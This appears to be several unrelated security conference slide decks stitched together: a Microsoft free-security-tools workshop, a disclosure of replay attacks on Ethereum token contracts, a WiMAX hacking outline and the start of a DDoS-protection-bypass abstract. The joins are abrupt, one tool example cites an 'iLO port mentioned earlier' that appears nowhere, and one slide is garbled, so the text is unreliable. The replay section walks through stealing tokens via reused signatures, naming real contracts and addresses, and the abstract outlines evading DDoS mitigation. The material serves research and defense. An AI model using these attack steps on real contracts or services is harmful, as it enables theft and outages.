http://www.softronix.com/logo.html
Two good sources for programming projects: Life and CoreWar!
Dewdney, A. K.; Armchair Universe: An Exploration of Computer Worlds (New
York: W. H Freeman & Co 1988)
Dewdney, A. K.; The Tinkertoy Computer and Other Machinations: Computer
Recreations... (New York: W. H. Freeman & Co 1993)
DEF CON 24
4 August
Las Vegas, USA
ME & VULNEX
Simon Roses Femerling
• Founder & CEO, VULNEX www.vulnex.com
• @simonroses
• Former Microsoft, PwC, @Stake
• US DARPA award to research on software security
• Speaker: Black Hat, RSA, HITB, OWASP, SOURCE, AppSec, DeepSec, TECHNET
• Blog: http://www.simonroses.com/
• Youtube: https://www.youtube.com/channel/UC8KUXxTSEdWfpFzAydjEzyQ
• CyberSecurity Startup
• @vulnexsl
• Professional Services & Training
• Products: BinSecSweeper (Unified File Security Analysis)
VULNEX
DISCLAIMER & LICENSE
• All Tools and resources are property
of Microsoft and their authors
• Non-affiliated with Microsoft
WORKSHOP OBJECTIVES
• What has Microsoft to offer?
• How to improve our security posture
for free!
• Development and IT Security
AGENDA
1. Introduction
2. Secure Development
3. IT Security
4. Conclusions
1. DEVELOPERS VS SYSADMINS VS ALL…
1. FATAL ERROR
1. DEFENSE IN DEPTH
1. MEMO FROM BILL GATES
• https://news.microsoft.com/2012/01/11/memo-from-bill-gates/#sm.001he6hz618bod7bz7k10g0w76fr0
1. MICROSOFT SDL
• The Security Development Lifecycle (SDL) is a software development process that helps developers build more secure software and address security compliance requirements while reducing development cost
• https://www.microsoft.com/en-us/SDL
1. MICROSOFT SDL
1. SDL: TRAINING
• SDL Practice #1: Core Security Training
This practice is a prerequisite for implementing the SDL. Foundational concepts for building better software include secure design, threat modeling, secure coding, security testing, and best practices surrounding privacy.
1. SDL: REQUIREMENTS
• SDL Practice #2: Establish Security and Privacy Requirements
Defining and integrating security and privacy requirements early helps make it easier to identify key milestones and deliverables and minimize disruptions to plans and schedules.
• SDL Practice #3: Create Quality Gates/Bug Bars
Defining minimum acceptable levels of security and privacy quality at the start helps a team understand risks associated with security issues, identify and fix security bugs during development, and apply the standards throughout the entire project.
• SDL Practice #4: Perform Security and Privacy Risk Assessments
Examining software design based on costs and regulatory requirements helps a team identify which portions of a project will require threat modeling and security design reviews before release and determine the Privacy Impact Rating of a feature, product, or service.
1. SDL: DESIGN
• SDL Practice #5: Establish Design Requirements
Considering security and privacy concerns early helps minimize the risk of schedule disruptions and reduce a project's expense.
• SDL Practice #6: Attack Surface Analysis/Reduction
Reducing the opportunities for attackers to exploit a potential weak spot or vulnerability requires thoroughly analyzing overall attack surface and includes disabling or restricting access to system services, applying the principle of least privilege, and employing layered defenses wherever possible.
• SDL Practice #7: Use Threat Modeling
Applying a structured approach to threat scenarios during design helps a team more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations.
1. SDL: IMPLEMENTATION
• SDL Practice #8: Use Approved Tools
Publishing a list of approved tools and associated security checks (such as compiler/linker options and warnings) helps automate and enforce security practices easily at a low cost. Keeping the list regularly updated means the latest tool versions are used and allows inclusion of new security analysis functionality and protections.
• SDL Practice #9: Deprecate Unsafe Functions
Analyzing all project functions and APIs and banning those determined to be unsafe helps reduce potential security bugs with very little engineering cost. Specific actions include using header files, newer compilers, or code scanning tools to check code for functions on the banned list, and then replacing them with safer alternatives.
• SDL Practice #10: Perform Static Analysis
Analyzing the source code prior to compile provides a scalable method of security code review and helps ensure that secure coding policies are being followed.
1. SDL: VERIFICATION
• SDL Practice #11: Perform Dynamic Analysis
Performing run-time verification checks software functionality using tools that monitor application behavior for memory corruption, user privilege issues, and other critical security problems.
• SDL Practice #12: Fuzz Testing
Inducing program failure by deliberately introducing malformed or random data to an application helps reveal potential security issues prior to release while requiring modest resource investment.
• SDL Practice #13: Attack Surface Review
Reviewing attack surface measurement upon code completion helps ensure that any design or implementation changes to an application or system have been taken into account, and that any new attack vectors created as a result of the changes have been reviewed and mitigated, including threat models.
1. SDL: RELEASE
• SDL Practice #14: Create an Incident Response Plan
Preparing an Incident Response Plan is crucial for helping to address new threats that can emerge over time. It includes identifying appropriate security emergency contacts and establishing security servicing plans for code inherited from other groups within the organization and for licensed third-party code.
• SDL Practice #15: Conduct Final Security Review
Deliberately reviewing all security activities that were performed helps ensure software release readiness. The Final Security Review (FSR) usually includes examining threat models, tools outputs, and performance against the quality gates and bug bars defined during the Requirements Phase.
• SDL Practice #16: Certify Release and Archive
Certifying software prior to a release helps ensure security and privacy requirements were met. Archiving all pertinent data is essential for performing post-release servicing tasks and helps lower the long-term costs associated with sustained software engineering.
1. SDL: RESPONSE
• SDL Practice #17: Execute Incident Response Plan
Being able to implement the Incident Response Plan instituted in the Release phase is essential to helping protect customers from software security or privacy vulnerabilities that emerge.
1. REDUCING VULNERABILITIES
1. REDUCING COSTS
1. SYSINTERNALS
• Not about Sysinternals suite
• Awesome tools!
• https://technet.microsoft.com/en-
us/sysinternals/bb545021
2. AVAILABLE SECURE DEVELOPMENT TOOLS
1. Microsoft Solutions Framework (MSF) for Capability Maturity Model Integration (CMMI) 2013 plus Security Development Lifecycle (SDL)
2. Microsoft Solutions Framework (MSF) for Agile 2013 plus Security Development Lifecycle (SDL)
3. TM SDL 2016
4. AntiXSS
5. Visual Studio 2012 / 2015
6. FXCOP
7. CAT.NET
8. SDL REGEX FUZZER
9. SDL MINIFUZZ
10. App Verifier
11. BinScope
12. Binskim
2. TOOL: MICROSOFT SOLUTIONS FRAMEWORK (MSF) FOR CAPABILITY MATURITY MODEL INTEGRATION (CMMI) 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
• Version: 1.0
• Downloadable template that integrates the Microsoft Security Development Lifecycle (SDL) directly into your Visual Studio Team Foundation Server 2013 software development environment.
• Requires Visual Studio Team Foundation Server 2013
• More info: https://www.microsoft.com/en-us/SDL/adopt/processtemplate.aspx
Download: https://www.microsoft.com/en-us/download/details.aspx?id=42519
2. TOOL: MICROSOFT SOLUTIONS FRAMEWORK (MSF) FOR CAPABILITY MATURITY MODEL INTEGRATION (CMMI) 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL) – FEATURES
SDL requirements
SDL policies
Custom vulnerabilities queries
SDL guides & resources
Final Security Review (FSR) report
Third party tool integration
Security templates
2. TOOL: MICROSOFT SOLUTIONS FRAMEWORK (MSF) FOR CAPABILITY MATURITY MODEL INTEGRATION (CMMI) 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
2. TOOL: MICROSOFT SOLUTIONS FRAMEWORK (MSF) FOR AGILE 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
• Version: 1.0
• Same as before but for Agile development
• Requires Visual Studio Team Foundation Server 2013
• More info: https://www.microsoft.com/en-us/SDL/adopt/agile.aspx
Download: https://www.microsoft.com/en-us/download/details.aspx?id=42517
2. TOOL: MICROSOFT SOLUTIONS FRAMEWORK (MSF) FOR AGILE 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
2. TOOL: SDL TM 2016
• Version: 2016
• Threat Modeling
• Find threats during the design phase, determine threats and define appropriate mitigations, and distribute security tasks across stakeholders
• More info: https://blogs.microsoft.com/cybertrust/2015/10/07/whats-new-with-microsoft-threat-modeling-tool-2016/
Download: https://www.microsoft.com/en-us/download/details.aspx?id=49168
2. TOOL: SDL TM 2016
STRIDE
Spoofing
Tampering
Repudiation
Information Disclosure
Elevation of Privilege
2. TOOL: SDL TM 2016
2. TOOL: BANNED.H
• Version: 2.0
• Insecure functions banned by the SDL
• Visual Studio then flags them at build time so they can be replaced by a more secure version
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=24817
2. TOOL: BANNED.H
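To make this concrete, a minimal C sketch of a banned call and the safer CRT replacement (strcpy_s per the MSVC secure CRT):

#include <string.h>

void copy_unsafe(char *dst, const char *src) {
    strcpy(dst, src);          /* banned: no bounds check */
}

void copy_safer(char dst[64], const char *src) {
    strcpy_s(dst, 64, src);    /* bounded replacement */
}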
2. TOOL: ANTIXSS
• Version: 4.3
• Library to mitigate the potential of Cross-Site Scripting (XSS) attacks in web-based applications
• AKA: Microsoft Web Protection Library
• Two components:
– Development library
– Security Runtime Engine (SRE) – XSS & SQLi
• Included by default starting with .NET 4.0 (standalone end of life)
https://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder(v=vs.110).aspx
• More info:
https://wpl.codeplex.com/
https://www.microsoft.com/en-us/download/details.aspx?id=28589
2. TOOL: ANTIXSS
Method – Description
HtmlEncode – Encodes a value for use in HTML content
HtmlAttributeEncode – Encodes and outputs the specified string for use in an HTML attribute
XmlEncode – Encodes the specified string for use in XML content
XmlAttributeEncode – Encodes the specified string for use in XML attributes
UrlEncode – Encodes the specified string for use in a URL
UrlPathEncode – Encodes path strings for use in a URL
JavaScriptEncode – Encodes a string for safe use in JavaScript
2. TOOL: ANTIXSS
1. Use
2. Example
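A minimal usage sketch in C# (assumes .NET 4.5+, where the encoder ships in System.Web.dll; the comment variable stands in for untrusted input inside an ASP.NET page):

using System.Web.Security.AntiXss;

string comment = Request.QueryString["comment"];   // untrusted input (illustrative)
string safeHtml = AntiXssEncoder.HtmlEncode(comment, useNamedEntities: false);
string safeAttr = AntiXssEncoder.HtmlAttributeEncode(comment);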
2. TOOL: VISUAL STUDIO 2015
• Version: 2015
• Microsoft Development Environment
• More info: https://www.visualstudio.com
• VS Secure Documentation:
https://msdn.microsoft.com/en-us/library/k3a3hzw7.aspx
https://msdn.microsoft.com/en-us/library/jj161081.aspx
https://msdn.microsoft.com/en-us/library/4cftbc6c.aspx
2. TOOL: VISUAL STUDIO 2015
VS SECURITY FLAG – DESCRIPTION
/guard – Analyze control flow for indirect call targets at compile time
/GS – Insert overrun detection code into functions that are at risk of being exploited
/SAFESEH – Prevent the execution of exception handlers that are introduced by a malicious attack
/NXCOMPAT – DEP guards the CPU against the execution of non-code pages
/analyze – Reports potential security issues such as buffer overrun, un-initialized memory, null pointer dereferencing, and memory leaks
/DYNAMICBASE – Address Space Layout Randomization (ASLR)
/SDL – Enables a superset of the baseline security checks (compile-time & runtime checks)
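An illustrative MSVC command line combining these switches (a sketch; /guard:cf is the compiler spelling of the /guard check, and /SAFESEH only applies to x86 links):

cl /GS /sdl /analyze /guard:cf app.c /link /NXCOMPAT /DYNAMICBASE /SAFESEH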
2. TOOL: VISUAL STUDIO 2015
/SDL – Compile-time checks
2. TOOL: VISUAL STUDIO 2015
/SDL – Runtime checks
Enables the strict mode of /GS run-time buffer overrun detection
Performs limited pointer sanitization
Performs class member initialization
2. TOOL: VISUAL STUDIO 2015
• Note: Visual Studio 2015 Update 1 and 2 add telemetry function calls into binaries
• Compile from the command line to remove this functionality:
– notelemetry.obj
• https://www.reddit.com/r/cpp/comments/4ibauu/visual_studio_adding_telemetry_function_calls_to/d30dmvu
2. TOOL: VISUAL STUDIO 2015
2. TOOL: FXCOP
• Version: 10.0
• Static code analysis for managed
applications
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=8279
2. TOOL: FXCOP
FXCOP RULES
COM
Design
Globals
Names
Performances
Security
Interaction between managed and native code
.NET Code Access Security
Exposed interfaces in code
Best practices
Memory
2. TOOL: FXCOP
2. TOOL: CAT.NET
• Version: 2.0
• .NET static analysis (source code / binaries)
• GUI and Command Line
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=5570 (v1 x64)
http://blogs.msdn.com/b/securitytools/archive/2009/11/12/how-to-run-cat-net-2-0-ctp.aspx (v2 Beta)
2. TOOL: CAT.NET
CAT.NET SECURITY RULES
Cross-Site Scripting (XSS)
SQL Injection
LDAP Injection
XPATH Injection
Redirections
Process Command Execution
File Canonicalization
Exception Disclosure
2. TOOL: CAT.NET
OWASP TOP 10 - 2013
A1 - Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery (CSRF)
A9 – Using Known Vulnerable Components
A10 – Unvalidated Redirects and Forwards
2. TOOL: CAT.NET
2. TOOL: SDL REGEX FUZZER
• Version: 1.1.0
• Regular expression (REGEX) fuzzer to identify DoS
• Download: http://www.microsoft.com/en-us/download/details.aspx?id=20095
2. TOOL: SDL REGEX FUZZER
2. TOOL: SDL MINIFUZZ
• Version: 1.5.5.0
• Command line fuzzer
• Easy to use
• Download: www.microsoft.com/en-us/download/details.aspx?id=21769
2. TOOL: SDL MINIFUZZ
2. TOOL: APP VERIFIER
• Version: 4.0.665
• Runtime bug catcher
• Analyze C++ programs
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=20028
2. TOOL: APP VERIFIER
APP VERIFIER RULES
Heaps
Handles
Locks
TLS
Memory
Exceptions
Threadpool
Low Resources simulation
2. TOOL: APP VERIFIER
2. TOOL: BINSCOPE
• Version: 2014
• Analyzes binaries for SDL compilation best
practices (Managed and native)
• Last version command line only
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=44995
2. TOOL: BINSCOPE
BINSCOPE RULES
Missing Build Time Flags
/GS
/SAFESEH
/NXCOMPAT
/DYNAMICBASE
Binary Features
Global function pointers
Shared read/write sections
Partially trusted called managed assemblies
Compiler version
2. TOOL: BINSCOPE
BINSCOPE CHECK – SDL
AppContainerCheck (required for Windows Store certification) – NO
ATLVersionCheck – YES
ATLVulnCheck – YES
CompilerVersionCheck – YES
DBCheck – YES
DefaultGSCookieCheck – YES
ExecutableImportsCheck – YES
FunctionPointersCheck – NO
GSCheck – YES
GSFriendlyInitCheck – YES
GSFunctionSafeBuffersCheck – YES
HighEntropyVACheck – YES
2. TOOL: BINSCOPE
BINSCOPE CHECK – SDL
NXCheck – YES
RSA32Check – YES
SafeSEHCheck – YES
SharedSectionCheck – YES
VB6Check – YES
WXCheck – YES
2. TOOL: BINSCOPE
2. TOOL: BINSKIM
• Version: 1.3.4
• Binary static analysis tool that provides
security and correctness results for
Windows portable executables
• Download:
https://github.com/Microsoft/binskim
2. TOOL: BINSKIM
RULES
Crypto Errors
Security mitigations enabled
Vulnerable libraries
Etc.
2. TOOL: BINSKIM
• Compilation process:
1. Clone / Download code
2. Load src/BinSkim.sln in Visual Studio
2015
3. Set to release mode
4. Build
2. TOOL: BINSKIM
3. AVAILABLE IT SECURITY TOOLS
1. SECURITY ESSENTIALS / WINDOWS
DEFENDER
2. MBSA
3. Microsoft Security Assessment Tool
4. Microsoft Security Compliance Manager
5. WACA
6. Attack Surface Analyzer
7. Portqry
8. EMET
9. Message Analyzer
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
• Version: Windows 10
• Identifies and removes malware
• Security Essentials or Windows Defender:
– Windows 7, Vista and XP: Windows Defender only
removes spyware. You must install Security
Essentials
– Windows 8 or later: Windows Defender by default
in OS, removes malware
• Download: http://windows.microsoft.com/es-es/windows/security-essentials-download
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
3. TOOL: MBSA
• Version: 2.3
• Microsoft Baseline Security Analyzer
(MBSA)
• Security scanner for Windows
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=7558
3. TOOL: MBSA
• Scans for:
– Windows administration vulnerabilities
– Weak passwords
– IIS administration vulnerabilities
– SQL administrative vulnerabilities
• Can configure Windows Update on
scanned systems
3. TOOL: MBSA
3. TOOL: MICROSOFT SECURITY ASSESSMENT TOOL
• Version: 4.0
• Risk-assessment application designed to
provide information and recommendations
about best practices for security within an
information technology (IT) infrastructure
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=12273
3. TOOL: MICROSOFT SECURITY ASSESSMENT TOOL
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
• Version: 3.0
• Provides centralized security baseline management features, a baseline portfolio, customization capabilities, and security baseline export flexibility to accelerate your organization's ability to efficiently manage the security and compliance process for the most widely used Microsoft technologies
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=16776
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
• Note: SCM version 3.0 does not install on Windows 10 due to the incompatible SQL Server 2008 Express.
However, if you install SQL Server 2008 R2 Express Edition standalone first, you can then install SCM on Windows 10.
https://www.microsoft.com/en-US/download/details.aspx?id=30438
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
3. TOOL: WACA
• Version: 2.0
• Microsoft Web Application Configuration
Analyzer
• Download: http://www.microsoft.com/en-us/download/details.aspx?id=573
3. TOOL: WACA
WACA RULES
General Application Rules (62)
IIS Application Rules (75)
SQL Application Rules (22)
3. TOOL: WACA
3. TOOL: ATTACK SURFACE ANALYZER
• Version: 1.0
• Identifies changes to a Windows system
when installing an application
• Ideally run on a system equal to
production
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=24487
3. TOOL: ATTACK SURFACE ANALYZER
SCANS FOR
Registry
File Systems
Registered Filetypes
Ports
Process
Etc.
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: PORTQRY
• Version: 2.0
• Port scanner
• GUI and command line
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=24009
3. TOOL: PORTQRY
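An illustrative command-line query (the target IP is a placeholder), here probing the iLO web port mentioned earlier in this workshop:

portqry -n 10.0.0.10 -p tcp -e 2381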
3. TOOL: EMET
• Version: 5.5
• Enhanced Mitigation Experience Toolkit
(EMET)
• Toolkit for deploying and configuring
security mitigation technologies
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=46366
3. TOOL: EMET
3. TOOL: MESSAGE ANALYZER
• Version: 1.4
• Enables you to capture, display, and analyze protocol messaging traffic, and to trace and assess system events and other messages from Windows components
• Download: https://www.microsoft.com/en-us/download/details.aspx?id=44226
3. TOOL: MESSAGE ANALYZER
4. SECURITY ARSENAL
• A vast arsenal of free security tools
released by Microsoft (Thanks):
1. Development
2. IT
• There are even more tools available!
4. NO EXCUSES
4. ONLY TECHNOLOGY IS NOT ENOUGH
4. FREE TRAINING
• Microsoft SDL Process Training
https://www.microsoft.com/en-
us/sdl/process/training.aspx
• SAFECode Training
https://training.safecode.org/
5. Q&A
• Thanks!
• Beer appreciated!!!
• @simonroses
• @vulnexsl
• www.vulnex.com
• www.simonroses.com
Replay Attacks on Ethereum Smart Contracts
Zhenxuan Bai, Yuwei Zheng, Kunzhe Chai, Senhua Wang
About us
• 360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PCs and cellphones.
• UnicornTeam (https://unicorn.360.com/) was built in 2014. This is a group that focuses on the security issues in many kinds of wireless telecommunication systems. The team also encourages members to do other research that they are interested in.
• Highlighted works of UnicornTeam include:
– Low-cost GPS spoofing research (DEFCON 23)
– LTE redirection attack (DEFCON 24)
– Attack on power line communication (Black Hat USA 2016)
The Main Idea
Part 1: Background
Part 2: Safety Problem
Part 3: Replay Attack
Part 4: Demonstration
Part 1
Background
(Blockchain & smart contract & Ethereum)
What is Blockchain?
Blockchain is:
A large-scale globally decentralized computer network
A system that users can interact with by sending transactions
Transactions are guaranteed by a consensus mechanism
Advantages of Blockchain
• Having a unified database with rapid consensus
• A large-scale fault-tolerant mechanism
• Not relying on trust, not controlled by any single administrator or organization (not for private/consortium blockchains)
• Auditable: external observers can verify transaction history
• Automation: operating without human involvement
What on earth can Blockchain do?
Cryptocurrency: digital assets on the Blockchain
There are tokens in the public blockchains, used to limit the rates of updating transactions and to power the maintenance of the Blockchain.
Non-monetary characteristics:
Record registration (such as a Domain Name System based on the Blockchain)
Timestamps to track high-value data
Supported functionalities:
Financial contracts
General computation
Ethereum
Around 2013, the public realized that Blockchain can be used in hundreds
of applications besides cryptocurrency, such as asset issuance,
crowdfunding, domain-name registration, ownership registration, market
forecasting, Internet of things, voting and so on.
How to realize?
Smart contracts are pieces of code that live on the Blockchain and execute commands exactly as they were told to.
"Smart contract" – a computer program running in a secure environment that automatically transfers digital assets according to arbitrary pre-specified rules.
[Diagram: business person -> developer -> smart contract]
How to build one?
■ Blockchain with built-in programming language
■ maximum abstraction and versatility
■ ideal for processing smart contracts
Ethereum
Ethereum
EVM: It is the operating environment for smart contract in
the Ethereum. It is not only encapsulated by a sandbox, but
in fact it is completely isolated, that is, the code that runs
inside the EVM does not have access to the network, file
system, or other processes. Even smart contracts have
limited contact with other smart contracts.
Operating System
Contract usage scenarios
Financial scenarios: hedging contracts, savings purse, testamentary contracts
Non-financial scenarios: online voting, decentralized governance, domain name registration
Part 2
Related Safety Problem
The Ecology of the Ethereum
On average, 100 thousand new users join the Ethereum ecosystem every day. Users are very active, with more than 1 million transactions per day on Ethereum.
The safety issues of Ethereum
The main parts:
exchanges – attacks and token theft
wallets – liable to be hijacked
smart contracts – overflow attacks
The security problem of smart contracts
April 2018: BEC contract
May 2018: EDU contract
June 2018: SNC contract
These directly affect the major exchanges, including the issuing, recharging, or withdrawal of the tokens.
Vulnerability in Smart Contracts
According to <Finding The Greedy, Prodigal, and Suicidal Contracts at Scale>, in March 2018, nearly 1 million smart contracts were analyzed, among which 34,200 smart contracts can be easily attacked by hackers.
How to lower the probability of loss?
A complete and objective audit is required for smart contracts.
An emergency response can be made when a vulnerability is found in a smart contract.
A reward can be provided when someone detects a bug.
Replay attack on
smart contract
Part 3
What we care about – replay attacks
Replay attack: if a transaction is legitimate on one blockchain, it is also legitimate on another blockchain.
When you transfer BTC1, your BTC2/BTC3 may be transferred at the same time.
Our discovery
Many smart contracts adopt the same way to verify the validity of the signature, which makes replay attacks possible.
Our motivation
We propose the replay attacks on smart contracts, hoping to attract users' attention.
We detect the vulnerability in smart contracts, hoping to make them more secure.
We hope to enhance risk awareness for contract creators and ensure the interests of investors.
we!found!the!replay!attack!problem!exists!in!52!smart!contracts.!!
We! analyzed! the! smart! contract! example! to! verify! the! replay!
attack.!
We!analyzed!the!source!and!process!of!replay!attack!to!expound!
the!feasibility!of!replay!attack!in!principle.!!!
We!verified!the!replay!attack!based!on!the!signature!
vulnerability.!!
We!proposed!defense!strategy!to!prevent!this!problem.!!
Our Contribution
• Judging whether the contract accords with the ERC20 standard.
We set three scanning standards to discover the smart contracts which have the vulnerability:
require(totalSupply > 0)
Vulnerability Scanning
• Get the name of the contract to determine whether the name is valid.
Vulnerability Scanning
• Filter smart contracts vulnerable to replay attack.
Scanning result: 52 risky targets
Vulnerability Scanning
● It has been confirmed that there are two smart contracts that allow proxy transactions.
● The two smart contracts use a similar mechanism and share the same transaction format.
● When a transaction happens in one contract, this transaction will also be legal in the other contract, and the replay attack will be successfully executed.
Why does the replay attack occur?
The issue lies in this line: bytes32 h = keccak256(_from,_to,_value,_fee,nonce);
Example
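To make the flaw concrete, here is a minimal sketch, not from the original material, of why this digest replays across contracts: it commits only to the transfer fields, never to the verifying contract or chain. It assumes web3.py v5 (Web3.solidityKeccak; v6 renames it solidity_keccak) and reuses the Alice and Bob addresses from the demonstration setup; the value, fee and nonce numbers are illustrative.

from web3 import Web3

# Alice and Bob from the demonstration setup (see "Account setting" below).
alice = Web3.toChecksumAddress("0x8e65d5349ab0833cd76d336d380144294417249e")
bob = Web3.toChecksumAddress("0x5967613d024a1ed052c8f9687dc74897dc7968d6")
value, fee, nonce = 2, 0, 1  # illustrative numbers

# Equivalent of: bytes32 h = keccak256(_from, _to, _value, _fee, nonce);
h = Web3.solidityKeccak(
    ["address", "address", "uint256", "uint256", "uint256"],
    [alice, bob, value, fee, nonce],
)
# Nothing here identifies the verifying contract or chain, so any contract
# computing this digest recovers the same signer from one (v, r, s) triple.
print(h.hex())

Because UGT-style and MTC-style contracts compute exactly the same digest, a signature that one contract's ecrecover accepts is equally valid in the other.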
Attack Process
● We chose two ERC20 smart contracts, the UGT contract and the MTC contract.
● We created two accounts, Alice and Bob.
● We deposited some tokens into the two accounts in the UGT and MTC contracts.
● At least one Ethereum full node.
Experiment condition
Step one: transaction records on the Ethereum were scanned to find out accounts which held both UGT tokens and MTC tokens (we use two accounts, Alice and Bob).
Verification of the replay attack process
Step two: Bob induced Alice to send him 2 UGT tokens. The transaction input data is shown below:
Function: transferProxy(address _from, address _to, uint256 _value, uint256 _feeUgt, uint8 _v, bytes32 _r, bytes32 _s)
MethodID: 0xeb502d45
Verification of the replay attack process
Step three: Bob took out the input data of this transaction from the blockchain. The parameters “from, to, value, fee, v, r, s” were extracted from [0] to [6] in step two. The following is the implementation of the transfer function.
Verification of the replay attack process
Step four: Bob used the input data from step two to execute another transfer in the smart contract of MTC. The result of this transaction is shown below.
Verification of the replay attack process
Step five: Bob got not only 2 UGT tokens but also 2 MTC tokens from Alice. In this process, the transfer of 2 MTC tokens was not authorized by Alice.
Verification of the replay attack process
Part 4
Demonstration
Select contract
Account setting
genesis.json
the UGT contract and the MTC contract
• Alice and Bob
• Alice (the sender): 0x8e65d5349ab0833cd76d336d380144294417249e
• Bob (the receiver): 0x5967613d024a1ed052c8f9687dc74897dc7968d6
• Both own some tokens for transferring.
UGT Token: 0x43eE79e379e7b78D871100ed696e803E7893b644
MTC Token: 0xdfdc0D82d96F8fd40ca0CFB4A288955bECEc2088
Core code
Demo
Demo
By April 27th, 2018, the loophole of this replay attack risk existed in 52 Ethereum smart contracts.
Grouped according to the vulnerability of the replay attack:
• High-risk group (10/52): no specific information is contained in the signature of the smart contract, so the signature can be fully reused.
• Moderate-risk group (37/52): a fixed string is contained in the signature of the smart contract, so the probability of reusing the signature is still high.
• Low-risk group (5/52): the address of the contract (1 in 5) or the address of the sender (4 in 5) is contained in the signature of the smart contract. There are strong restrictions, but the possibility of replay attacks still exists.
Statistics and Analysis
• Replay in the same contract (5/52): MiracleTele, RoyalForkToken, FirstBlood, KarmaToken, KarmaToken2
• Cross-contract replay (45/52)
Besides, we divided these 45 contracts into 3 groups by the specific prefix data used in the signatures. Cross-contract replays may happen among any contracts as long as they are in the same group.
According to feasible replay attack approaches:
Statistics and Analysis
✓ Group 1: the specific prefix data 1 used in the signatures (28/52)
ARCCoin, BAF, Claes Cash, Claes Cash2, CNF, CWC, DET, Developeo, Envion, FiCoin, GoldCub, JaroCoin, metax, metax2, NODE, NODE2, NPLAY, SIGMA, solomex, Solomon Exchange, Solomon Exchange2, Trump Full Term Token, Trump Impeachment Token, X, ZEUS TOKEN, ZEUS TOKEN2, cpay
✓ Group 2: the specific prefix data 2 used in the signatures (7/52)
"\x19Ethereum Signed Message:\n32"
Acore, CLC, CLOUT, CNYToken, CNYTokenPlus, GigBit, The 4th Pillar Token
Statistics and Analysis
According to feasible replay attack approaches:
✓ Group 3: no specific prefix data used in the signatures (10/52)
BlockchainCuties, First (smt), GG Token, M2C Mesh Network, M2C Mesh Network2, MJ comeback, MJ comeback2, MTC Mesh Network, SmartMesh Token, UG Token
• Replay between test chain and main chain (2/52): MeshBox, MeshBox2
• Replay between different main chains (0/52)
According to feasible replay attack approaches:
Statistics and Analysis
According to the trading frequency of the above-mentioned contracts:
By 9:00 April 30th, 2018,
• 24 contracts were found which have transaction records within one week; the proportion is 46.15% of the total number of contracts.
• 9 contracts were found which have transaction records from one week to one month; the proportion is 17.31% of the total number of contracts.
Statistics and Analysis
According to the trading frequency of the above-mentioned contracts:
By 9:00 April 30th, 2018,
• 16 contracts were found which have transaction records beyond one month; the proportion is 30.77% of the total number of contracts.
• 3 contracts only have records for deployment; the proportion is 5.77% of the total number of contracts.
According to the comprehensive analysis, 63.46% of the contract transactions are still active.
Statistics and Analysis
• The designers of smart contracts should always confirm the suitable range of a digital signature when designing smart contracts.
• Smart contracts deployed on a public chain should add in the specific information of the public chain, such as the chainID and the name of the public chain.
• The users of smart contracts need to pay attention to news and reports concerning loophole disclosures.
Countermeasures
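As a hedged illustration of the second countermeasure above, the sketch below (web3.py v5 assumed again; the chain ID and the UGT contract address from the demo serve as the binding context) produces a digest whose signature cannot be replayed in any other contract or chain:

from web3 import Web3

contract = Web3.toChecksumAddress("0x43eE79e379e7b78D871100ed696e803E7893b644")
alice = Web3.toChecksumAddress("0x8e65d5349ab0833cd76d336d380144294417249e")
bob = Web3.toChecksumAddress("0x5967613d024a1ed052c8f9687dc74897dc7968d6")
chain_id = 1  # illustrative; use the deployment chain's ID

# Binding the signed digest to a chain ID and the verifying contract address
# makes the same (v, r, s) useless in any other contract or chain.
h = Web3.solidityKeccak(
    ["uint256", "address", "address", "address", "uint256", "uint256", "uint256"],
    [chain_id, contract, alice, bob, 2, 0, 1],  # value/fee/nonce illustrative
)
print(h.hex())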
• The security problems of smart contracts have drawn wide concern.
• As long as the signature is not limited by the smart contract, there is a possibility of replay attack.
• We believe that loopholes in Ethereum smart contracts have not totally come to light.
Conclusion
WiMAX Hacking 2010
pierce goldy aSmig
DEFCON 18
updated slides, code, and discussion at
https://groups.google.com/group/wimax-hacking
The Technology
Service and Deployment
Reseller Access
Echo Peak
Clearspot
Hacking the Home Device
HTC EVO
Captive Portal Bypass
Location Based Services
Google Group
https://groups.google.com/group/wimax-hacking | pdf |
Kill 'em All -- DDoS Protection Total Annihilation!
Tony T.N. Miu1, W.L. Lee2, Alan K.L. Chung2, Daniel X.P. Luo2, Albert K.T. Hui2,
and Judy W.S. Wong2
1Nexusguard Limited
[email protected]
2Network Threats Information Sharing and Analysis Center (NT-ISAC)
Bloodspear Labs
{leng,alan,daniel,albert,judy}@bloodspear.org
Abstract. With the advent of paid DDoS protection in the forms of CleanPipe,
CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors...
or so they think! We're here to rip apart this false sense of security by dissecting
each and every mitigation techniques you can buy today, showing you in
clinical details how exactly they work and how they can be defeated.
Essentially we developed a 3-fold attack methodology:
1. stay just below red-flag rate threshold,
2. make our attack traffic look inconspicuous,
3. emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges,
4. ???
5. PROFIT!
We will explain all the required look-innocent headers, TCP / HTTP challenge-
response handshakes, JS auth bypass, etc. etc. in meticulous details. With that
